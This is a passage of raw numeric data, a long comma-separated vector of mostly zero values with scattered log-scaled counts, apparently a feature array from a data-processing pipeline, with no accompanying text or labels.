0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 3.0910424533583156, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 2.772588722239781, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 4.182806904693496, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 6.976014914136014, 0.0, 0, 0.0, 0.0, 0.0, 4.394449154672439, 3.7369991058576035, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 10.06087584278487, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 3.5263605246161616, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.812184355372417, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 4.292158018817389, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.2237778411112, 0.0, 5.76977456331519, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.8991863767100545, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0, 0, 3.3322045101752034, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 